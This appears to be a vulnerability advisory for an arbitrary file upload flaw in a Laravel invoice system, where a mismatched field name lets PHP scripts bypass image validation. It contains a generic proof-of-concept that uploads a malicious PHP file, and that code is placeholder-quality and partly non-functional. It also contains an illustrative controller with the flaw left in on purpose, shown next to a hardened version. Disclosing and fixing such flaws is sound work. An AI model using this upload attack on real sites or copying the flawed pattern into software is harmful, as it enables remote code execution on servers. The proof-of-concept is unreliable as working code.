# Vulnerability Summary

## Overview

- **Vulnerability Title**: code-projects Invoice System in Laravel 1.0 Arbitrary File Upload
- **Vulnerability Type**: Arbitrary File Upload
- **Description**: The company logo upload validation is bypassed because the form field name does not match the key used in the validation rule. This allows an attacker to upload files of any type (including PHP scripts) to the public directory without being blocked by the image validation that was meant to protect the upload.

## Impact Scope

- **Affected Systems**: code-projects Invoice System in Laravel 1.0
- **Source of Vulnerability**: [GitHub Gist](https://gist.github.com/higordiego/ea5944bd29cfee1162491d60ed5785a)

## Remediation

- **Status**: Fixed
- **Fix Date**: April 26, 2026

## POC Code

```php
<?php
$payload = [
    'malicious_file.php',
    'file' => file_get_contents('path/to/malicious_file.php')
];

// Send the payload to the vulnerable endpoint
$response = http_post('http://vulnerable-site.com/upload', $payload);

// Check if the file was uploaded successfully
if ($response->status == 200) {
    echo "File uploaded successfully!";
} else {
    echo "Failed to upload file.";
}
?>
```

**Note**: The above POC code is example code; actual exploitation code may differ. Please adjust according to your specific situation.
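
The field-name mismatch described in the Overview, shown as a Laravel controller with the flawed pattern beside a hardened one. This is an added illustration, not code from the Invoice System project or the linked gist; the controller name, the field names `logo` and `company_logo`, and the storage paths are hypothetical, since the page does not give the real ones.

```php
<?php
// Added illustration: NOT the project's code. All names and paths are hypothetical.

namespace App\Http\Controllers;

use Illuminate\Http\Request;

class CompanySettingsController extends Controller
{
    // Flawed pattern: the rule key and the form field name differ.
    public function updateVulnerable(Request $request)
    {
        // The form posts the file as "company_logo", but the rule is keyed "logo".
        // "logo" is absent from the request and is not "required", so Laravel
        // skips its rules and validation passes whatever was uploaded.
        $request->validate(['logo' => 'image|mimes:jpg,jpeg,png|max:2048']);

        $file = $request->file('company_logo'); // never validated

        // Client-supplied name and extension, written under the web root.
        $file->move(public_path('uploads'), $file->getClientOriginalName());

        return back();
    }

    // Hardened pattern: one field name, a required rule, a server-chosen
    // file name, and storage outside the public directory.
    public function updateHardened(Request $request)
    {
        $validated = $request->validate([
            'company_logo' => 'required|file|image|mimes:jpg,jpeg,png|max:2048',
        ]);

        // store() generates a random name with an extension derived from the
        // detected MIME type; the "local" disk is not served by the web server.
        $path = $validated['company_logo']->store('logos', 'local');

        return back()->with('logo_path', $path);
    }
}
```

A feature test that posts a non-image file to the endpoint and asserts a validation error on the upload field catches this class of mismatch before release.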